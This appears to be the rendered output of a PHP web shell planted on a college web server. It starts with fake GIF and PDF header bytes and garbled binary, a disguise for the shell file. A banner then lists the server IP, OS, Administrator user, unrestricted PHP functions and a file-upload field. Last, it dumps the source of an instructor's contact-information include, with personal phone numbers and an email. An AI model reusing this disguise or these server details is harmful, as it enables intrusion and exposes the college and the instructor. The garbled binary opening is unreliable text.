GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/ |
Upload File : |
<? // JimMartinson/ContactInformation.phpinc // Display the Instructor contact information. if ( $_SERVER['REMOTE_ADDR'] == 'x173.16.60.216' ) d_On(); // You can set any key/value and it will display in your contact information list. Only 'Instructor', 'Email address' and 'Weekly schedule' are preset for use. // They will be displayed in the order you create them with the exception of 'Weekly schedule'. // The format for creating $InstructorInformation key/values is: $InstructorInformation['Contact display text'] = 'Contact information'; // 'Instructor' is used for the alt attribute of your 'Weekly schedule' image. // 'Email address' is used to generate an email link. // 'Weekly schedule' is displayed with a header line and is at the bottom of the contact information $InstructorInformation = array(); $InstructorInformation['Instructor'] = 'Jim Martinson (James)'; $InstructorInformation['Image'] = '<img src="/images/JimMartinson100.jpg" width="100" height="144" alt="Jim Martinson">'; $InstructorInformation['Email address'] = 'Jim.Martinson@ridgewater.edu'; $InstructorInformation['Work number'] = '320-234-8546. <span class="note">This number does not accept text messages.</span>'; $InstructorInformation['Cell number'] = '320-583-8490.'; $InstructorInformation['Office hours'] = 'Monday thru Saturday 9:00am to 9:00pm excluding class times below. <br>Call me! <br>I alternate between the Hutchinson and Willmar campuses so connecting with me face-to-face is complicated. <br>Your phone is the primary method to contact me. We can talk immediately or set up an appointment at a later time. <br>If I do not answer please leave a name, phone number, and a short description of why you called. I will get back to you as soon as I can. '; $InstructorInformation['ImageMap'] = ' <map name="ScheduleMap" id="ScheduleMap">'; // M 9:00am-11:30am $InstructorInformation['ImageMap'] .= '<area shape="rect" coords="48,50,240,165" title="CST2274 Schedule" alt="CST2274" href="/JimMartinson/CST2274/Schedule/">'; // M 1:00pm-3:30pm $InstructorInformation['ImageMap'] .= '<area shape="rect" coords="48,235,240,347" title="CST1861 Schedule" alt="CST1861" href="/JimMartinson/CST1861/Schedule/">'; // T 12:00pm-1:00pm CST Weekly meeting $InstructorInformation['ImageMap'] .= '<area shape="rect" coords="252,187,444,222" title="CST Weekly meeting" alt="CST Weekly meeting" href="https://minnstate.zoom.us/my/jeff.polman/">'; // T 1:00pm-3:30pm $InstructorInformation['ImageMap'] .= '<area shape="rect" coords="252,235,444,347" title="CST1602 Schedule" alt="CST1602" href="/JimMartinson/CST1602/Schedule/">'; // W 9:00am-11:30am $InstructorInformation['ImageMap'] .= '<area shape="rect" coords="457,50,651,165" title="CST2608 Schedule" alt="CST2608" href="/JimMartinson/CST2608/Schedule/">'; // W 1:00pm-3:30pm $InstructorInformation['ImageMap'] .= '<area shape="rect" coords="457,235,651,347" title="CST1021 Schedule" alt="CST1021" href="/JimMartinson/CST1021/Schedule/">'; // H 1:00pm-3:30pm $InstructorInformation['ImageMap'] .= '<area shape="rect" coords="664,235,856,347" title="CST1600 Schedule" alt="CST1600" href="/JimMartinson/CST1600/Schedule/">'; /**/ $InstructorInformation['ImageMap'] .= ' </map> '; //if ( $_SESSION['userId'] == 1 ) $showAll = true; # Waldo Show old dates as well. require('common/ContactInformation.phpinc'); ?>